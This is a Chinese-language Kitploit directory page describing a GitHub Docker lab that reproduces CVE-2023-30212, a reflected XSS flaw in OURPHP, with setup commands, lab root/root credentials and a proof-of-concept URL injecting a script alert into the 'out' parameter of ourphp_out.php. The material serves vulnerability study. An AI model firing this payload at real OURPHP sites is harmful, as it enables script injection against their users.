Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-30212 — 基于Docker的易受攻击OURPHP实验室,用于复现CVE-2023-30212(反射型XSS漏洞),包含设置说明和概念验证利用URL。 | Kitploit
工具/GitHubGitHub/aash035/cve-2023-30212
容器安全漏洞分析Web应用程序漏洞利用学习与教育实验室与实践
GitHubaash035/cve-2023-30212

CVE-2023-30212

基于Docker的易受攻击OURPHP实验室,用于复现CVE-2023-30212(反射型XSS漏洞),包含设置说明和概念验证利用URL。

查看仓库
133年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-30212 实验室搭建

先决条件
下载 docker.io
sudo apt install -y docker.io


步骤
  1. 使用以下命令从我的仓库下载所有文件。
    git clone https://github.com/AAsh035/CVE-2023-30212.git

  2. 现在运行以下命令创建 Docker 镜像:
    sudo docker build -t vuln .

  3. 接下来将 Docker 镜像转换为容器。容器需要在 80 端口运行。命令如下:
    sudo docker run -d -p 80:80 vuln

  4. 使用以下命令检查容器是否运行:
    sudo docker ps

  5. 在浏览器中输入 127.0.0.1,将会加载 OURPHP 页面。

  6. 需要配置 ourphp,设置如下:
    用户名:root
    密码:root
    数据库名称:vuln

  7. 现在需要配置管理员用户名和密码。设置如下:
    用户名:root
    密码:root

  8. 复制以下链接并在浏览器中粘贴:
    http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>

https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0

下载工具